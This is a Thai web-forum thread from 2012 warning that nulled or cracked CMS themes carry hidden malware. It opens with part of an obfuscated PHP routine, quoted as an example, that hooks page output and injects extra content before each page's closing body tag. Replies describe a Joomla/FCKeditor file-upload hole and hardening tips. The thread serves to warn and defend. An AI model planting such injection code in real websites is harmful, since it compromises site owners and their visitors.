if($R30B2AB8DC1496D06B230A71D8962AF5D&4){ $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2)); $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1]; $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB; } 
if($R30B2AB8DC1496D06B230A71D8962AF5D&8){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } 
if($R30B2AB8DC1496D06B230A71D8962AF5D&16){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } 
if($R30B2AB8DC1496D06B230A71D8962AF5D&2){ $RBE4C4D037E939226F65812885A53DAD9+=2; } $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9)); if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){ $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C; } return $R034AE2AB94F99CC81B389A1822DA3353; } } 
function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){ Header('Content-Encoding: none'); $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B); 
if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){ return preg_replace('/(\]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE); }else{ return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml(); } } ob_start('mrobh'); } }

เพื่อนๆ คงจะเดาออกนะครับว่ามันคืออะไร  :wanwan007:

น่ากลัวป่ะล่าาาาาาาาาาาาาา  :wanwan035:

หรือเพื่อนๆ สามารถตรวจสอบ Malware ในเว็บได้ที่
วิธีตรวจสอบ Malware ในเว็บไซต์ ([url]http://iz-host.com/new/general/%E0%B8%84%E0%B8%A7%E0%B8%B2%E0%B8%A1%E0%B8%9B%E0%B8%A5%E0%B8%AD%E0%B8%94%E0%B8%A0%E0%B8%B1%E0%B8%A2/malware-%E0%B9%80%E0%B8%A7%E0%B9%87%E0%B8%9A%E0%B9%84%E0%B8%8B%E0%B8%95%E0%B9%8C/[/url])


ปล.เพิ่มตัวอย่าง Code จริงๆ
ปล2.ขอบคุณสำหรับน้ำใจที่ทุกท่าน Thank ให้นะครับ  :wanwan012:




แบบนี้ใครจะรู้บ้าง

นอกจาก โปรแกรมเมอร์

 :wanwan014:

หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านการ Nulled หรือ cracked
เริ่มหัวข้อโดย: iczykung ที่ 10 ตุลาคม 2012, 02:09:17
ลองเข้าไปเช็คตามลิงค์ที่ผมให้ไปครับ จะรู้ว่าเว็บเราติดไหม

หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านการ Nulled หรือ cracked
เริ่มหัวข้อโดย: solutioncom ที่ 10 ตุลาคม 2012, 10:57:22
สำหรับ joomla ตัวที่โหลดมาใช้กัน มันไม่มี สคริปฝังติดมาครับ
แต่สคริปจะถูกเขียนทับขึ้นมาใหม่ อันนี้ยังสรุปไม่ได้ว่าเกิดจากการเช็คของเจ้าของ template แล้วมาเขียนทับ หรือว่าโดนอย่างอื่น
บางสคริปโดนเขียนทับใน libraries ก็มีแต่ก็หาไม่ยากเท่าไร ทางที่ดีแนะนำว่าตอนขึ้น host จริง ให้ทำการตั้งค่า permission ของโฟลเดอร์ต่างๆให้เรียบร้อย เวลาจะแก้ไขอะไรก็ค่อยไปเปิดเพื่อทำการแก้ไข แล้วก็ปิดให้เรียบร้อย รับรองว่าไม่ว่าจะเกิดจากอะไรก็ตาม ยังไงก็เขียนทับไฟล์ไม่ได้ นอกจากจะโดนขั้นเทพ  :wanwan004:

หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านการ Nulled หรือ cracked
เริ่มหัวข้อโดย: flash ที่ 10 ตุลาคม 2012, 11:38:55
เข้ารหัสได้ยาวจริงๆ ครับ +1

หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่าน
เริ่มหัวข้อโดย: Juststarted ที่ 10 ตุลาคม 2012, 18:39:50
อ้างจาก: iczykung ที่ 09 ตุลาคม 2012, 12:43:13
อ้างจาก: Juststarted ที่ 08 ตุลาคม 2012, 22:41:37
:wanwan015: :wanwan015: ผมก็เจอครับ([url]http://image.ohozaa.com/i/766/bfZlbj.png[/url]) ผมว่าจะเปลี่ยนใหม่ให้หมดเลย theme เนี้ย


งานงอกเลยครับอิอิ  สู้ๆ นะครับ


ท่านพอจะมีแนวทางจัดการหน่อยมั้ย ผมพยายามแล้วมันปฎิเสธ

หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่าน
เริ่มหัวข้อโดย: iczykung ที่ 10 ตุลาคม 2012, 18:57:43
อ้างจาก: solutioncom ที่ 10 ตุลาคม 2012, 10:57:22
สำหรับ joomla ตัวที่โหลดมาใช้กัน มันไม่มี สคริปฝังติดมาครับ
แต่สคริปจะถูกเขียนทับขึ้นมาใหม่ อันนี้ยังสรุปไม่ได้ว่าเกิดจากการเช็คของเจ้าของ template แล้วมาเขียนทับ หรือว่าโดนอย่างอื่น
บางสคริปโดนเขียนทับใน libraries ก็มีแต่ก็หาไม่ยากเท่าไร ทางที่ดีแนะนำว่าตอนขึ้น host จริง ให้ทำการตั้งค่า permission ของโฟลเดอร์ต่างๆให้เรียบร้อย เวลาจะแก้ไขอะไรก็ค่อยไปเปิดเพื่อทำการแก้ไข แล้วก็ปิดให้เรียบร้อย รับรองว่าไม่ว่าจะเกิดจากอะไรก็ตาม ยังไงก็เขียนทับไฟล์ไม่ได้ นอกจากจะโดนขั้นเทพ  :wanwan004:


สำหรับช่องโหว่ของ Joomla  ตัวอย่างเว็บกระทรวงนะครับ
โดน hack จาก FCKeditor หรือตัวที่เราใช้โพสบทความนั่นแหละครับ  มันมี function ที่ให้ user upload แล้ว hacker นำเอามาเปลี่ยน /path ไปreplace logo แทน ก็เลยจบข่าวเลยครับ  นอกเหนือจากนี้ยังสามารถ upload php file ไปแทนของเก่าเราได้ด้วยครับเช่น configuration.php
ทางที่ดีแนะนำว่าให้เปลี่ยน ไม่ก็ยกเลิก comment users ไปเลยครับ เอาไว้ admin อย่างเดียวก็พอปลอดภัยที่สุดครับ


 :wanwan011:ปล.ขอบคุณทุกท่านที่ Thank ให้นะครับ  ยินดีให้คำปรึกษาครับ  :wanwan002:

หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านการ Nulled หรือ cracked
เริ่มหัวข้อโดย: kangtung ที่ 11 ตุลาคม 2012, 09:17:03
ขอโทษที โพสต์อีกกระทู้ทำไมมาโผล่ที่นี่ไม่รู้

หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านก
เริ่มหัวข้อโดย: iczykung ที่ 25 ตุลาคม 2012, 00:36:24
ใครเจออีกบ้างน้อ  :wanwan008:

หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านก
เริ่มหัวข้อโดย: brucewayne ที่ 25 ตุลาคม 2012, 01:11:17
ภัยใกล้ตัวครับ ดันๆๆ

หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านก
เริ่มหัวข้อโดย: barbarian ที่ 02 ธันวาคม 2012, 17:05:36
หัวอกเดียวกัน


เพิ่งจัดการได้ก่อนเข้ามาอ่านกระทู้นี้ นั่งงมตั้งนานนนนนนนนนน


FTP software ใช้ของที่มั่นใจได้นะครับ ไม่งั้นโดนแน่ๆๆๆๆๆ



หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านก
เริ่มหัวข้อโดย: zankumuro ที่ 02 ธันวาคม 2012, 17:13:02
ของแถมๆ  :wanwan004:

หัวข้อ: Re: **เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านก
เริ่มหัวข้อโดย: CMSHostThailand ที่ 02 ธันวาคม 2012, 18:45:08
ต้องตรวจสอบดีๆ ทางที่ดีซื้อธีมลิขสิทธิ์มาใช้ค่ะ ปลอดภัย อัพเดตได้ตลอด


SMF 1.1.21 | Simple Machines | ThaiSEOBoard.com